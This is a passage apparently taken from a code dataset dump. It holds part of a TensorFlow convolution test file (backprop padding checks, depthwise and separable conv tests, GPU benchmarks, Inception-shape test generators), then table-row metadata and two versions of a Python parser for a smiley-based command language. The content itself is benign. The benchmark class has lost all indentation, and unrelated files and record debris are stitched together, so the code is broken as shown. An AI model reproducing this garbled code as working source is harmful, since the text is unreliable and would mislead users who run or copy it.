                filter_placeholder: filter_val
            })
      # Negative padding during backprop.
      with self.assertRaisesRegex(
          errors_impl.InvalidArgumentError,
          "All elements of explicit_paddings must be nonnegative"):
        filter_placeholder = array_ops.placeholder(
            dtypes.float32, shape=[18, 18, 3, 2])
        filter_val = np.ones([18, 18, 3, 2])
        out_backprop = array_ops.placeholder(
            dtypes.float32, shape=[32, 3, 2, 2])
        out_backprop_val = np.ones([32, 3, 2, 2])
        sess.run(
            nn_ops.conv2d_backprop_input([32, 20, 20, 3],
                                         filter_placeholder,
                                         out_backprop,
                                         strides=[1, 1, 1, 1],
                                         padding=[[0, 0], [-1, 0], [0, 0],
                                                  [0, 0]]),
            feed_dict={
                filter_placeholder: filter_val,
                out_backprop: out_backprop_val
            })
      with self.assertRaisesRegex(
          errors_impl.InvalidArgumentError,
          "All elements of explicit_paddings must be nonnegative"):
        input_placeholder = array_ops.placeholder(
            dtypes.float32, shape=[32, 20, 20, 3])
        input_val = np.ones([32, 20, 20, 3])
        out_backprop = array_ops.placeholder(
            dtypes.float32, shape=[32, 3, 2, 2])
        out_backprop_val = np.ones([32, 3, 2, 2])
        sess.run(
            nn_ops.conv2d_backprop_filter(
                input_placeholder, [18, 18, 3, 2],
                out_backprop,
                strides=[1, 1, 1, 1],
                padding=[[0, 0], [-1, 0], [0, 0], [0, 0]]),
            feed_dict={
                input_placeholder: input_val,
                out_backprop: out_backprop_val
            })
class DepthwiseConv2DTest(test.TestCase):

  def _VerifyValues(self, tensor_in_sizes, filter_in_sizes, stride, padding,
                    expected):
    """Runs depthwise_conv2d on incrementing inputs and checks the output.

    Args:
      tensor_in_sizes: Input shape [batch, rows, cols, depth].
      filter_in_sizes: Filter shape [rows, cols, depth, channel multiplier].
      stride: Spatial stride (applied to both dimensions).
      padding: Padding scheme, "SAME" or "VALID".
      expected: Expected flattened output values.
    """
    input_count = 1
    for dim in tensor_in_sizes:
      input_count *= dim
    filter_count = 1
    for dim in filter_in_sizes:
      filter_count *= dim
    # Fill input and filter with incrementing values starting at 1 so the
    # expected outputs are deterministic.
    input_values = [float(v) for v in range(1, input_count + 1)]
    filter_values = [float(v) for v in range(1, filter_count + 1)]
    with self.cached_session():
      in_tensor = constant_op.constant(input_values, shape=tensor_in_sizes)
      in_tensor.set_shape(tensor_in_sizes)
      filt_tensor = constant_op.constant(filter_values, shape=filter_in_sizes)
      conv = nn_impl.depthwise_conv2d(
          in_tensor, filt_tensor, strides=[1, stride, stride, 1],
          padding=padding)
      result = self.evaluate(conv)
      tf_logging.debug("value = %s", result)
      self.assertArrayNear(expected, np.ravel(result), 1e-5)
      self.assertShapeEqual(result, conv)

  def testConv2D2x2Filter(self):
    """Depthwise 2x2 filter over a 2x3 depth-2 input, VALID padding."""
    expected_output = [196, 216, 272, 296, 252, 280, 344, 376]
    self._VerifyValues(
        tensor_in_sizes=[1, 2, 3, 2],
        filter_in_sizes=[2, 2, 2, 2],
        stride=1,
        padding="VALID",
        expected=expected_output)
class SeparableConv2DTest(test.TestCase):

  def _InitValues(self, sizes):
    """Returns a constant tensor of the given shape filled with 0.5, 1.0, ..."""
    total_size = 1
    for s in sizes:
      total_size *= s
    x = [f * 0.5 for f in range(1, total_size + 1)]
    return constant_op.constant(x, shape=sizes)

  def _VerifyValues(self,
                    tensor_in_sizes,
                    depthwise_filter_in_sizes,
                    pointwise_filter_in_sizes,
                    stride,
                    padding,
                    expected,
                    data_format="NHWC"):
    """Runs separable_conv2d and compares against the expected flat output.

    Args:
      tensor_in_sizes: Input shape, given in NHWC order.
      depthwise_filter_in_sizes: Depthwise filter shape.
      pointwise_filter_in_sizes: Pointwise (1x1) filter shape.
      stride: Spatial stride (applied to both dimensions).
      padding: Padding scheme ("SAME"/"VALID") or an explicit NHWC padding
        list.
      expected: Expected flattened output values.
      data_format: "NHWC" or "NCHW"; for NCHW the input, strides and padding
        are transposed before the op and the output transposed back.
    """
    with self.cached_session(use_gpu=True) as sess:
      t1 = self._InitValues(tensor_in_sizes)
      f1 = self._InitValues(depthwise_filter_in_sizes)
      f1.set_shape(depthwise_filter_in_sizes)
      f2 = self._InitValues(pointwise_filter_in_sizes)
      real_t1 = t1
      strides = [1, stride, stride, 1]
      if data_format == "NCHW":
        real_t1 = array_ops.transpose(t1, [0, 3, 1, 2])
        strides = [1, 1, stride, stride]
        if isinstance(padding, list):
          # Reorder the explicit NHWC padding list into NCHW order.
          padding = [padding[0], padding[3], padding[1], padding[2]]
      conv = nn_impl.separable_conv2d(
          real_t1,
          f1,
          f2,
          strides=strides,
          padding=padding,
          data_format=data_format)
      if data_format == "NCHW":
        conv = array_ops.transpose(conv, [0, 2, 3, 1])
      value = self.evaluate(conv)
      tf_logging.debug("value = %s", value)
      self.assertArrayNear(expected, np.ravel(value), 2e-3)
      self.assertShapeEqual(value, conv)

  def _testSeparableConv2D(self, data_format):
    """Checks separable_conv2d with SAME padding against hard-coded values."""
    expected_output = [
        6644.5, 6971.5, 7298.5, 7625.5, 7952.5, 8279.5, 8606.5, 8154.5, 8556.5,
        8958.5, 9360.5, 9762.5, 10164.5, 10566.5, 9664.5, 10141.5, 10618.5,
        11095.5, 11572.5, 12049.5, 12526.5, 4145.5, 4346.5, 4547.5, 4748.5,
        4949.5, 5150.5, 5351.5, 12684.5, 13311.5, 13938.5, 14565.5, 15192.5,
        15819.5, 16446.5, 14194.5, 14896.5, 15598.5, 16300.5, 17002.5, 17704.5,
        18406.5, 15704.5, 16481.5, 17258.5, 18035.5, 18812.5, 19589.5, 20366.5,
        6499.5, 6814.5, 7129.5, 7444.5, 7759.5, 8074.5, 8389.5, 18724.5,
        19651.5, 20578.5, 21505.5, 22432.5, 23359.5, 24286.5, 20234.5, 21236.5,
        22238.5, 23240.5, 24242.5, 25244.5, 26246.5, 21744.5, 22821.5, 23898.5,
        24975.5, 26052.5, 27129.5, 28206.5, 8853.5, 9282.5, 9711.5, 10140.5,
        10569.5, 10998.5, 11427.5, 5746.75, 6010.75, 6274.75, 6538.75, 6802.75,
        7066.75, 7330.75, 6168.75, 6452.25, 6735.75, 7019.25, 7302.75, 7586.25,
        7869.75, 6590.75, 6893.75, 7196.75, 7499.75, 7802.75, 8105.75, 8408.75,
        2036.25, 2119.5, 2202.75, 2286.0, 2369.25, 2452.5, 2535.75
    ]
    self._VerifyValues(
        tensor_in_sizes=[1, 4, 4, 2],
        depthwise_filter_in_sizes=[2, 2, 2, 3],
        pointwise_filter_in_sizes=[1, 1, 6, 7],
        stride=1,
        padding="SAME",
        expected=expected_output,
        data_format=data_format)

  def testSeparableConv2D(self):
    self._testSeparableConv2D("NHWC")

  # NOTE(review): intentionally not named test* so it does not run; the NCHW
  # variant appears to be disabled pending support -- confirm before enabling.
  def disabledtestSeparableConv2DNCHW(self):
    if not test.is_gpu_available():
      return
    self._testSeparableConv2D("NCHW")

  def _testSeparableConv2DEqualInputOutputDepth(self, data_format):
    """Checks separable_conv2d where pointwise input depth == output depth."""
    expected_output = [
        5742.0, 6069.0, 6396.0, 6723.0, 7050.0, 7377.0, 7047.0, 7449.0, 7851.0,
        8253.0, 8655.0, 9057.0, 8352.0, 8829.0, 9306.0, 9783.0, 10260.0,
        10737.0, 3582.0, 3783.0, 3984.0, 4185.0, 4386.0, 4587.0, 10962.0,
        11589.0, 12216.0, 12843.0, 13470.0, 14097.0, 12267.0, 12969.0, 13671.0,
        14373.0, 15075.0, 15777.0, 13572.0, 14349.0, 15126.0, 15903.0, 16680.0,
        17457.0, 5616.0, 5931.0, 6246.0, 6561.0, 6876.0, 7191.0, 16182.0,
        17109.0, 18036.0, 18963.0, 19890.0, 20817.0, 17487.0, 18489.0, 19491.0,
        20493.0, 21495.0, 22497.0, 18792.0, 19869.0, 20946.0, 22023.0, 23100.0,
        24177.0, 7650.0, 8079.0, 8508.0, 8937.0, 9366.0, 9795.0, 4963.5, 5227.5,
        5491.5, 5755.5, 6019.5, 6283.5, 5328.0, 5611.5, 5895.0, 6178.5, 6462.0,
        6745.5, 5692.5, 5995.5, 6298.5, 6601.5, 6904.5, 7207.5, 1757.25, 1840.5,
        1923.75, 2007.0, 2090.25, 2173.5
    ]
    self._VerifyValues(
        tensor_in_sizes=[1, 4, 4, 2],
        depthwise_filter_in_sizes=[2, 2, 2, 3],
        pointwise_filter_in_sizes=[1, 1, 6, 6],
        stride=1,
        padding="SAME",
        expected=expected_output,
        data_format=data_format)

  @test_util.deprecated_graph_mode_only
  def testSeparableConv2DEqualInputOutputDepth(self):
    self._testSeparableConv2DEqualInputOutputDepth("NHWC")

  def testSeparableConv2DEqualInputOutputDepthNCHW(self):
    if not test.is_gpu_available():
      return
    self._testSeparableConv2DEqualInputOutputDepth("NCHW")

  def _testSeparableConv2dExplicitPadding(self, data_format):
    """Checks explicit padding against manually pre-padded VALID conv."""
    tensor_in_sizes = [1, 4, 4, 2]
    depthwise_filter_in_sizes = [2, 2, 2, 3]
    pointwise_filter_in_sizes = [1, 1, 6, 7]
    padding = [[0, 0], [1, 2], [3, 4], [0, 0]]
    with self.cached_session(use_gpu=True):
      # Compute the expected values by padding the input manually and running
      # a VALID separable convolution over it.
      t1 = self._InitValues(tensor_in_sizes)
      t1 = array_ops.pad(t1, padding)
      f1 = self._InitValues(depthwise_filter_in_sizes)
      f1.set_shape(depthwise_filter_in_sizes)
      f2 = self._InitValues(pointwise_filter_in_sizes)
      conv = nn_impl.separable_conv2d(
          t1,
          f1,
          f2,
          strides=[1, 1, 1, 1],
          padding="VALID",
          data_format="NHWC")
      expected = self.evaluate(conv)
      expected = np.ravel(expected)
    self._VerifyValues(
        tensor_in_sizes=tensor_in_sizes,
        depthwise_filter_in_sizes=depthwise_filter_in_sizes,
        pointwise_filter_in_sizes=pointwise_filter_in_sizes,
        stride=1,
        padding=padding,
        expected=expected,
        data_format=data_format)

  def testSeparableConv2dExplicitPadding(self):
    self._testSeparableConv2dExplicitPadding("NHWC")

  def testSeparableConv2dExplicitPaddingNCHW(self):
    if not test.is_gpu_available():
      return
    self._testSeparableConv2dExplicitPadding("NCHW")
class DeepConv2DTest(test.TestCase):

  def _CompareFwdConv2D(self, tensor_in_sizes, filter_in_sizes, conv_strides,
                        padding):
    """Verifies the deep-conv2d path matches the default conv2d path.

    Evaluates the same conv2d twice, once with TF_USE_DEEP_CONV2D disabled
    and once enabled, and asserts the results are close.

    Args:
      tensor_in_sizes: Input shape [batch, rows, cols, depth].
      filter_in_sizes: Filter shape [rows, cols, in_depth, out_depth].
      conv_strides: Spatial strides [stride_rows, stride_cols].
      padding: Padding scheme, "SAME" or "VALID".
    """
    x1 = np.random.rand(*tensor_in_sizes).astype(np.float32)
    x2 = np.random.rand(*filter_in_sizes).astype(np.float32)
    with self.cached_session(use_gpu=False):
      t1 = constant_op.constant(x1, shape=tensor_in_sizes)
      t2 = constant_op.constant(x2, shape=filter_in_sizes)
      strides = [1] + conv_strides + [1]
      conv = nn_ops.conv2d(t1, t2, strides=strides, padding=padding)
      # Save and restore TF_USE_DEEP_CONV2D so this test does not leak
      # environment state into tests that run afterwards (previously the
      # variable was left set to "1" permanently).
      saved = os.environ.get("TF_USE_DEEP_CONV2D")
      try:
        os.environ["TF_USE_DEEP_CONV2D"] = "0"
        values_expect = self.evaluate([conv])
        os.environ["TF_USE_DEEP_CONV2D"] = "1"
        values_test = self.evaluate([conv])
      finally:
        if saved is None:
          os.environ.pop("TF_USE_DEEP_CONV2D", None)
        else:
          os.environ["TF_USE_DEEP_CONV2D"] = saved
      self.assertAllClose(values_expect, values_test, rtol=1e-5, atol=1e-5)

  def _RunTestCases(self, conv_strides, padding):
    """Runs _CompareFwdConv2D over a set of representative 3x3 shapes."""
    input_sizes = [[5, 5, 5, 1248], [3, 17, 17, 192], [2, 35, 35, 288],
                   [2, 6, 8, 517], [2, 7, 4, 81], [3, 11, 3, 77]]
    filter_sizes = [[3, 3, 1248, 128], [3, 3, 192, 192], [3, 3, 288, 384],
                    [3, 3, 517, 64], [3, 3, 81, 77], [3, 3, 77, 181]]
    for input_shape, filter_shape in zip(input_sizes, filter_sizes):
      self._CompareFwdConv2D(input_shape, filter_shape, conv_strides, padding)

  def testConv2D3x3FilterStride1x1Valid(self):
    self._RunTestCases([1, 1], "VALID")

  def testConv2D3x3FilterStride1x1Same(self):
    self._RunTestCases([1, 1], "SAME")
class Conv2DBenchmark(test.Benchmark):
def benchmarkGPUConvStackFirst(self):
if not test.is_gpu_available():
return
with ops.Graph().as_default(), session_lib.Session() as session:
batch_size = 1
timesteps = 600
features = 1
inputs = random_ops.random_uniform(
[batch_size, 1, timesteps, features], seed=1234)
num_outputs_list = [512] * 40 + [1]
kernel_w = 3
x = inputs
for num_outputs in num_outputs_list:
x = convolutional.conv2d(x, num_outputs, [1, kernel_w])
outputs = x
self.evaluate(variables.global_variables_initializer())
num_iterations = 4
for iter_index in xrange(num_iterations):
start = time.time()
session.run(outputs)
wall_time = time.time() - start
self.report_benchmark(
name="conv_stack_iter_%d" % iter_index, wall_time=wall_time)
tf_logging.info("conv_stack_iter_%d: %.4f" % (iter_index, wall_time))
def _bench_op(self, name, op, burn_iters, num_iters):
config = config_pb2.ConfigProto()
config.graph_options.rewrite_options.dependency_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
with session_lib.Session(config=config) as session:
self.evaluate(variables.global_variables_initializer())
self.run_op_benchmark(
session, op, burn_iters=burn_iters, min_iters=num_iters, name=name)
def benchmarkExplicitVsManualPadding(self):
if not test.is_gpu_available():
return
with ops.Graph().as_default():
burn_iters = 15
num_iters = 300
batch_size = 64
input = variables.Variable(
random_ops.random_uniform([
batch_size,
3,
224,
224
]))
filter = variables.Variable(random_ops.random_uniform([7, 7, 3, 64]))
strides = [1, 1, 2, 2]
padding = [(0, 0), (0, 0), (3, 3), (3, 3)]
output_explicit_pad = nn_ops.conv2d(
input, filter, strides, padding=padding, data_format="NCHW")
input_padded = array_ops.pad(input, padding)
output_manual_pad = nn_ops.conv2d(
input_padded, filter, strides, padding="VALID", data_format="NCHW")
self._bench_op("explicit_pad_forward", output_explicit_pad.op, burn_iters,
num_iters)
self._bench_op("manual_pad_forward", output_manual_pad.op, burn_iters,
num_iters)
input_grad_explicit_pad, filter_grad_explicit_pad = (
gradients_impl.gradients(output_explicit_pad, [input, filter]))
self._bench_op(
"explicit_pad_backward",
control_flow_ops.group(input_grad_explicit_pad,
filter_grad_explicit_pad), burn_iters,
num_iters)
input_grad_manual_pad, filter_grad_manual_pad = gradients_impl.gradients(
output_manual_pad, [input, filter])
self._bench_op(
"manual_pad_backward",
control_flow_ops.group(input_grad_manual_pad, filter_grad_manual_pad),
burn_iters, num_iters)
def benchmarkExplicitVsSamePaddingGraph(self):
if not test.is_gpu_available():
return
with ops.Graph().as_default():
burn_iters = 15
num_convs = 20
num_iters = 50
batch_size = 64
input = variables.Variable(
random_ops.random_uniform([
batch_size,
256,
14,
14
]))
filter = variables.Variable(random_ops.random_uniform([3, 3, 256, 256]))
strides = [1, 1, 1, 1]
padding = [(0, 0), (0, 0), (1, 1), (1, 1)]
output_explicit_pad = input
output_same_pad = input
for _ in range(num_convs):
output_explicit_pad = nn_ops.conv2d(
output_explicit_pad,
filter,
strides,
padding=padding,
data_format="NCHW")
output_same_pad = nn_ops.conv2d(
output_same_pad,
filter,
strides,
padding="SAME",
data_format="NCHW")
grad_explicit_pad, = gradients_impl.gradients(output_explicit_pad, filter)
grad_same_pad, = gradients_impl.gradients(output_same_pad, filter)
self._bench_op("graph_explicit_pad", grad_explicit_pad.op, burn_iters,
num_iters)
self._bench_op("graph_same_pad", grad_same_pad.op, burn_iters, num_iters)
  def benchmarkExplicitVsSamePaddingEager(self):
    """Benchmarks eager-mode conv chains: explicit padding vs SAME padding.

    Same shapes as the graph-mode benchmark, but run under eager execution:
    after a warm-up phase, each timed iteration records `num_convs` convs on
    a GradientTape and computes the filter gradient. Reports average
    wall time per iteration via `report_benchmark`. GPU only.
    """
    if not test.is_gpu_available():
      return
    with context.eager_mode():
      burn_iters = 15
      num_convs = 20
      num_iters = 50
      batch_size = 64
      input = variables.Variable(
          random_ops.random_uniform([
              batch_size,
              256,
              14,
              14
          ]))
      filter = variables.Variable(random_ops.random_uniform([3, 3, 256, 256]))
      strides = [1, 1, 1, 1]
      padding = [(0, 0), (0, 0), (1, 1), (1, 1)]
      output_explicit_pad = input
      output_same_pad = input
      # Warm-up: run both variants untimed so kernel autotuning/caching does
      # not pollute the measurements below.
      for _ in range(burn_iters):
        output_explicit_pad = nn_ops.conv2d(
            output_explicit_pad,
            filter,
            strides,
            padding=padding,
            data_format="NCHW")
        output_same_pad = nn_ops.conv2d(
            output_same_pad,
            filter,
            strides,
            padding="SAME",
            data_format="NCHW")
      # Timed run with explicit padding.
      start = time.time()
      for _ in range(num_iters):
        with backprop.GradientTape() as tape:
          for _ in range(num_convs):
            output_explicit_pad = nn_ops.conv2d(
                output_explicit_pad,
                filter,
                strides,
                padding=padding,
                data_format="NCHW")
          tape.gradient(output_explicit_pad, filter)
      end = time.time()
      self.report_benchmark(
          name="eager_explicit_pad",
          wall_time=(end - start) / num_iters,
          iters=num_iters)
      # Timed run with padding="SAME".
      start = time.time()
      for _ in range(num_iters):
        with backprop.GradientTape() as tape:
          for _ in range(num_convs):
            output_same_pad = nn_ops.conv2d(
                output_same_pad,
                filter,
                strides,
                padding="SAME",
                data_format="NCHW")
          tape.gradient(output_same_pad, filter)
      end = time.time()
      self.report_benchmark(
          name="eager_same_pad",
          wall_time=(end - start) / num_iters,
          iters=num_iters)
def GetInceptionFwdTest(input_size, filter_size, stride, padding,
                        gpu_only=False):
  """Builds a test method comparing forward conv values for one shape.

  The returned callable is attached to Conv2DTest via setattr in __main__.
  """
  params = (input_size, filter_size, stride, padding)

  def Test(self):
    # Some configurations are only meaningful when a GPU is present.
    if gpu_only and not test.is_gpu_available():
      tf_logging.info("Skipping InceptionFwd %s", params)
      return
    tf_logging.info("Testing InceptionFwd %s", params)
    self._CompareFwdValues(input_size, filter_size, [stride, stride], padding)

  return Test
def GetInceptionFwdDilatedConvTest(input_size, filter_size, stride, padding):
  """Builds a test method verifying dilated-conv values for one shape."""
  params = (input_size, filter_size, stride, padding)

  def Test(self):
    # Dilated convolutions are only exercised for the stride-1 shapes;
    # other strides make the test a silent no-op, as in the original suite.
    if stride != 1:
      return
    tf_logging.info("Testing InceptionFwd with dilations %s", params)
    self._VerifyDilatedConvValues(
        tensor_in_sizes=input_size,
        filter_in_sizes=filter_size,
        strides=[stride, stride],
        dilations=[2, 2],
        padding=padding,
        rtol=5e-4)

  return Test
def GetInceptionBackInputTest(input_size, filter_size, output_size, stride,
                              padding,
                              gpu_only=False):
  """Builds a test method for conv2d backprop-to-input on one shape."""
  params = (input_size, filter_size, output_size, stride, padding)

  def Test(self):
    if gpu_only and not test.is_gpu_available():
      tf_logging.info("Skipping InceptionBackInput %s", params)
      return
    tf_logging.info("Testing InceptionBackInput %s", params)
    self._CompareBackpropInput(input_size, filter_size, output_size,
                               [stride, stride], padding)

  return Test
def GetInceptionBackFilterTest(input_size, filter_size, output_size, strides,
                               padding, gpu_only=False):
  """Builds a test method for conv2d backprop-to-filter on one shape."""
  params = (input_size, filter_size, output_size, strides, padding)

  def Test(self):
    if gpu_only and not test.is_gpu_available():
      tf_logging.info("Skipping InceptionBackFilter %s", params)
      return
    tf_logging.info("Testing InceptionBackFilter %s", params)
    self._CompareBackFilter(input_size, filter_size, output_size, strides,
                            padding)

  return Test
if __name__ == "__main__":
  # Dynamically attach one fwd / dilated / back-input / back-filter test per
  # shrunk Inception shape onto Conv2DTest, each wrapped to run in both
  # graph and eager modes.
  for index, (input_size_, filter_size_, output_size_, stride_,
              padding_) in enumerate(GetShrunkInceptionShapes()):
    setattr(Conv2DTest, "testInceptionFwd_" + str(index),
            test_util.run_in_graph_and_eager_modes(
                GetInceptionFwdTest(input_size_, filter_size_, stride_,
                                    padding_)))
    setattr(
        Conv2DTest, "testInceptionFwdDilatedConv_" + str(index),
        test_util.run_in_graph_and_eager_modes(GetInceptionFwdDilatedConvTest(
            input_size_, filter_size_, stride_, padding_)))
    setattr(Conv2DTest, "testInceptionBackInput_" + str(index),
            test_util.run_in_graph_and_eager_modes(
                GetInceptionBackInputTest(input_size_, filter_size_,
                                          output_size_, stride_, padding_)))
    setattr(Conv2DTest, "testInceptionBackFilter_" + str(index),
            test_util.run_in_graph_and_eager_modes(
                GetInceptionBackFilterTest(input_size_, filter_size_,
                                           output_size_, [stride_, stride_],
                                           padding_)))
  # One extra large-spatial shape, registered GPU-only where applicable.
  ishape = [1, 400, 400, 1]
  fshape = [1, 1, 1, 256]
  oshape = [1, 400, 400, 256]
  setattr(Conv2DTest, "testInceptionFwd_No_Winograd_Nonfused",
          test_util.run_in_graph_and_eager_modes(
              GetInceptionFwdTest(ishape, fshape, 1, "SAME", gpu_only=True)))
  setattr(Conv2DTest, "testInceptionFwdDilatedConv_No_Winograd_Nonfused",
          test_util.run_in_graph_and_eager_modes(
              GetInceptionFwdDilatedConvTest(ishape, fshape, 1, "SAME")))
  setattr(Conv2DTest, "testInceptionBackInput_No_Winograd_Nonfused",
          test_util.run_in_graph_and_eager_modes(
              GetInceptionBackInputTest(ishape, fshape, oshape, 1, "SAME",
                                        gpu_only=True)))
  setattr(Conv2DTest, "testInceptionBackFilter_No_Winograd_Nonfused",
          test_util.run_in_graph_and_eager_modes(
              GetInceptionBackFilterTest(ishape, fshape, oshape, [1, 1], "SAME",
                                         gpu_only=True)))
  test.main()
| true | true |
f72343ede96ccf965e3565c07a8472b33c4cf857 | 4,086 | py | Python | lib/command.py | autowitch/llama | cc18e1f646e6deae5a461b8a4f3a914463999b35 | [
"MIT"
] | 1 | 2018-12-21T22:03:30.000Z | 2018-12-21T22:03:30.000Z | lib/command.py | autowitch/llama | cc18e1f646e6deae5a461b8a4f3a914463999b35 | [
"MIT"
] | null | null | null | lib/command.py | autowitch/llama | cc18e1f646e6deae5a461b8a4f3a914463999b35 | [
"MIT"
] | 1 | 2021-05-16T07:11:41.000Z | 2021-05-16T07:11:41.000Z | import re
from lib.command_constants import CommandConstants
from lib.errors import ParseError
class Command(object):
    """Data bucket describing one parsed command line.

    A command consists of a smiley, the command text, an importance marker
    and a right-hand indicator; these can appear either free-format or at
    fixed column offsets (tight or wide layout).
    """

    # Fixed-column field spans (start, end) for the tight and wide layouts.
    _TIGHT_SPANS = ((0, 4), (4, 49), (49, 64), (64, 79))
    _WIDE_SPANS = ((0, 4), (4, 79), (79, 131), (131, 200))

    def __init__(self, line="", free_format=False, tight=False):
        super(Command, self).__init__()
        # Layout selection flags.
        self.free_format = free_format
        self.tight = tight
        # Parsed components, initialised to neutral defaults.
        self.smiley = ''
        self.importance = 3
        self.command = ''
        self.right_hand_indicator = None
        self.original_importance = 3
        # Smiley sub-parts (filled in by parse_smiley).
        self.topper = ''
        self.eyes = ''
        self.nose = ''
        self.mouth = ''
        self.execution_probability = 100
        self.command_type = CommandConstants.UNKNOWN
        if line:
            self.parse(line)

    def parse_smiley(self, line, orig):
        """Parse the leading smiley, recording its parts on self.

        Returns (smiley, remainder); raises ParseError when absent.
        """
        match = re.match(CommandConstants.smile_expr, line)
        if match is None:
            raise ParseError('%s does not start with a smiley' % orig)
        # NOTE(review): mixed set-and-return here (as in the original) —
        # the smiley parts are stored on self while the text is returned.
        self.topper = match.group('topper')
        self.eyes = match.group('eyes')
        self.nose = match.group('nose')
        self.mouth = match.group('mouth')
        if self.eyes == '%':
            # '%' eyes mean the command only runs half the time.
            self.execution_probability = 50
        return match.group('smiley'), match.group('remainder')

    def parse_command(self, line, orig):
        """Parse the command text (everything up to the first '!')."""
        match = re.match("\s*(?P<command>[^!]+)(?P<remainder>.*)$", line)
        if match is None:
            raise ParseError("%s does not have a command" % orig)
        return match.group('command').strip(), match.group('remainder')

    def parse_importance(self, line, orig):
        """Parse the importance marker; its length is the importance level."""
        match = re.match("\s*(?P<importance>![!1]*)\s*(?P<remainder>.*)$", line)
        if match is None:
            raise ParseError('%s does not have any importance' % orig)
        return len(match.group('importance')), match.group('remainder')

    def parse_rhi(self, line, orig):
        """Parse the right-hand indicator; missing indicator yields ''."""
        match = re.match("(?P<rhi>[^\s]*)\s*(?P<remainder>.*)", line)
        if match is None:
            return "", ""
        return match.group("rhi"), match.group("remainder")

    def __str__(self):
        return "%s %s %s %s" % (self.smiley, self.command,
                                self.importance,
                                self.right_hand_indicator)

    def parse(self, line):
        """Parse a full command line according to the configured layout."""
        orig = line
        if self.free_format:
            # Free format: each parser consumes a prefix and hands the
            # remainder to the next one.
            self.smiley, rest = self.parse_smiley(line, orig)
            self.command, rest = self.parse_command(rest, orig)
            self.importance, rest = self.parse_importance(rest, orig)
            self.original_importance = self.importance
            self.right_hand_indicator, rest = self.parse_rhi(rest, orig)
            return
        # Fixed layouts: slice the line at column offsets and parse each
        # stripped field independently.
        spans = self._TIGHT_SPANS if self.tight else self._WIDE_SPANS
        fields = [line[lo:hi].strip() for lo, hi in spans]
        self.smiley, _ = self.parse_smiley(fields[0], orig)
        self.command, _ = self.parse_command(fields[1], orig)
        self.importance, _ = self.parse_importance(fields[2], orig)
        self.original_importance = self.importance
        self.right_hand_indicator, _ = self.parse_rhi(fields[3], orig)

    def __repr__(self):
        return "<%s, %s, %s (%s), %s: %s>" % (self.smiley, self.command, self.importance,
                                              self.original_importance, self.right_hand_indicator,
                                              self.command_type)
| 37.145455 | 90 | 0.568282 | import re
from lib.command_constants import CommandConstants
from lib.errors import ParseError
class Command(object):
    """This is primarily a data bucket that holds information about
    a specific command"""

    def __init__(self, line="", free_format=False, tight=False):
        super(Command, self).__init__()
        # Layout flags: free-format parses by content; otherwise the line
        # is split at fixed column offsets (tight or wide).
        self.free_format = free_format
        self.tight = tight
        # Parsed components, initialised to neutral defaults.
        self.smiley = ''
        self.importance = 3
        self.command = ''
        self.right_hand_indicator = None
        self.original_importance = 3
        # Smiley sub-parts (filled in by parse_smiley).
        self.topper = ''
        self.eyes = ''
        self.nose = ''
        self.mouth = ''
        self.execution_probability = 100
        self.command_type = CommandConstants.UNKNOWN
        if line:
            self.parse(line)
    def parse_smiley(self, line, orig):
        # Returns (smiley, remainder); also stores the smiley parts on self.
        m = re.match(CommandConstants.smile_expr, line)
        if m:
            smiley = m.group('smiley')
            remainder = m.group('remainder')
            self.topper = m.group('topper')
            self.eyes = m.group('eyes')
            self.nose = m.group('nose')
            self.mouth = m.group('mouth')
            if self.eyes == '%':
                # '%' eyes mean the command only runs half the time.
                self.execution_probability = 50
        else:
            raise ParseError('%s does not start with a smiley' % orig)
        return smiley, remainder
    def parse_command(self, line, orig):
        # The command text is everything up to the first '!'.
        command_expr = "\s*(?P<command>[^!]+)(?P<remainder>.*)$"
        m = re.match(command_expr, line)
        if m:
            command = m.group('command')
            remainder = m.group('remainder')
        else:
            raise ParseError("%s does not have a command" % orig)
        return command.strip(), remainder
    def parse_importance(self, line, orig):
        # Importance level is the length of the '!' marker run.
        importance_expr = "\s*(?P<importance>![!1]*)\s*(?P<remainder>.*)$"
        m = re.match(importance_expr, line)
        if m:
            importance = m.group('importance')
            remainder = m.group('remainder')
        else:
            raise ParseError('%s does not have any importance' % orig)
        return len(importance), remainder
    def parse_rhi(self, line, orig):
        # Right-hand indicator; a missing indicator yields ("", "").
        rhi_expr = "(?P<rhi>[^\s]*)\s*(?P<remainder>.*)"
        m = re.match(rhi_expr, line)
        rhi = ""
        remainder = ""
        if m:
            rhi = m.group("rhi")
            remainder = m.group("remainder")
        return rhi, remainder
    def __str__(self):
        return "%s %s %s %s" % (self.smiley, self.command,
                                self.importance,
                                self.right_hand_indicator)
    def parse(self, line):
        """Parse a full command line according to the configured layout."""
        orig = line
        if self.free_format:
            # Free format: each parser consumes a prefix and hands the
            # remainder to the next.
            self.smiley, line = self.parse_smiley(line, orig)
            self.command, line = self.parse_command(line, orig)
            self.importance, line = self.parse_importance(line, orig)
            self.original_importance = self.importance
            self.right_hand_indicator, line = self.parse_rhi(line, orig)
        elif self.tight:
            # Tight layout: fields at fixed columns 0-4, 4-49, 49-64, 64-79.
            self.smiley, tmp = self.parse_smiley(line[0:4].strip(), orig)
            self.command, tmp = self.parse_command(line[4:49].strip(), orig)
            self.importance, tmp = self.parse_importance(line[49:64].strip(), orig)
            self.original_importance = self.importance
            self.right_hand_indicator, tmp = self.parse_rhi(line[64:79].strip(), orig)
        else:
            # Wide layout: fields at fixed columns 0-4, 4-79, 79-131, 131-200.
            self.smiley, tmp = self.parse_smiley(line[0:4].strip(), orig)
            self.command, tmp = self.parse_command(line[4:79].strip(), orig)
            self.importance, tmp = self.parse_importance(line[79:131].strip(), orig)
            self.original_importance = self.importance
            self.right_hand_indicator, tmp = self.parse_rhi(line[131:200].strip(), orig)
    def __repr__(self):
        return "<%s, %s, %s (%s), %s: %s>" % (self.smiley, self.command, self.importance,
                                              self.original_importance, self.right_hand_indicator,
                                              self.command_type)
| true | true |
f72343f0b5bc545893d36b9a7b421656a7206a13 | 3,456 | py | Python | src/python/findNbands.py | dmft-wien2k/dmft-wien2k-v2 | 83481be27e8a9ff14b9635d6cc1cd9d96f053487 | [
"Apache-2.0"
] | 5 | 2021-05-13T13:04:26.000Z | 2022-01-18T10:08:09.000Z | src/python/findNbands.py | dmft-wien2k/dmft-wien2k-v2 | 83481be27e8a9ff14b9635d6cc1cd9d96f053487 | [
"Apache-2.0"
] | 2 | 2016-07-12T21:37:53.000Z | 2016-07-12T21:42:01.000Z | src/python/findNbands.py | dmft-wien2k/dmft-wien2k | 83481be27e8a9ff14b9635d6cc1cd9d96f053487 | [
"Apache-2.0"
